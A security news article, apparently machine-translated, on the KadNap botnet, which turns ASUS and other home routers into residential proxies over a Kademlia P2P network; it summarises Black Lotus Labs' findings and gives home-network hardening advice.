KadNap the botnet that transforms routers into proxies and complicates detection with a P2P network

Weeks ago, security investigators alerted about a new and active botnet that is transforming domestic routers and other border equipment into proxies at the disposal of criminals. According to the threat research team known as Black Lotus Labs, this malware - baptized as KadNap - has grown remarkably since August 2025 and has already grouped tens of thousands of devices within a peer- to- peer network that complicates their tracking and mitigation.

The technical key to the problem is that KadNap uses a variant of the Kademlia protocol - a distributed hash table (DHT) - to hide and distribute command and control information (C2). Instead of relying on a single central server, infected devices communicate with each other to locate control nodes, so that removing a particular IP does not disable the block button. To understand the background idea, please refer to Kademlia's technical explanation in public sources such as the Wikipedia reference entry: https: / / en.wikipedia.org / wiki / Kademlia.

The reported technical modus operandi starts with the download of a malicious script (called aic.sh in the analysis) from a specific IP address. This script persists on the team creating a scheduled task that is often executed, and then installs an ELF binary - called kad in the findings - that acts as a botnet client. The binary consults the machine's external IP and synchronizes time and starts with NTP services to calibrate its behavior before integrating into the peer network.

Despite the decentralized appearance, researchers detected a pattern that opens a defense window: KadNap's implementation of Kademlia maintains constant connections to two specific nodes before reaching the final control servers. This behaviour reduces true decentralization and facilitates the identification of infrastructure relevant to the xclusion or the blockade. The discovery and analysis itself have been disseminated by Black Lotus Labs; their work highlights how attackers mix P2P techniques with repetitive operating habits that sometimes give them away.

Geographically, most of the committed devices are found in the United States - approximately 60% according to the report - with additional concentrations in Taiwan, Hong Kong and Russia. The botnet has reached around 14,000 nodes in the analyzed window, and almost half of these equipment are associated with control infrastructure specifically targeted at ASUS routers.

As for monetization, researchers relate KadNap to a proxy service called Doppelganger, which appears to be a repackaging of previous services such as Faceless. These markets sell access to infected machines such as "residential proxies," useful to cover up malicious traffic and remove blockages: from DDoS attacks to stuffing and brute force credentonal campaigns. This makes committed domestic equipment a commercial resource for criminal actors seeking anonymity and geographical filtering of traffic.

The defensive actions were not expected: Lumen stated that he has blocked on his own network the traffic associated with the identified control infrastructure, and announced that he would publish commitment indicators (IOCs) to help other operators and administrators detect and mitigate the botnet. These measures make it clear that cooperation between researchers, operators and suppliers is critical when a threat is distributed through the global network.

What can a home user or a small network manager do right now? Updating the router firmware and changing the default credentials is the first line of defense; many infections on edge devices thrive by weak credentials and unpatched versions. It is also appropriate to disable remote management functions if not used, enable WPA2 / 3 encryption in the Wi-Fi and segregate IoT devices into a network independent of the main network. If an infection is suspected, a restart is not always enough: restoring to factory values and applying the latest firmware is the safest way to clean a compromised router. For good practice and mitigation references, official guides to public agencies and security frameworks are useful; for example, CISA recommendations to protect domestic and teleworking networks offer concrete steps: https: / / www.cisa.gov / publication / securing-home-networks-work. It is also relevant to review documented persistence techniques in frames such as MITRE ATT & CK, which describe how malware uses programmed tasks to survive reboot: https: / / attack.mitre.org / techniques / T1053 /.

KadNap's history illustrates two trends that should be taken into account: on the one hand, attackers expand their scope by exploiting consumer devices that were not designed with robust safety; on the other, they resort to P2P architectures and concealment techniques to make it difficult to break their services. The combination of ill-protected devices and illegal businesses that sell "access as service" creates an ecosystem where damage is quickly scaled and the response requires both individual technical measures and coordinated interventions at the network and community level.

For those who want to deepen the technical analysis and follow-up of this botnet, the most prudent thing is to consult the original analysis of the researchers who have documented it and the updates published by the security response organizations. The work of Black Lotus Labs has been the main public source of this incident; its work demonstrates the usefulness of threat research to map tactics, techniques and procedures and to provide block lists that help stop proliferation.

In short, the emergence of KadNap reminds us that safety begins at home: keeping equipment up to date, changing credentials by default and applying good segmentation and monitoring practices significantly reduce the risk that our router will become a piece more than one botnet.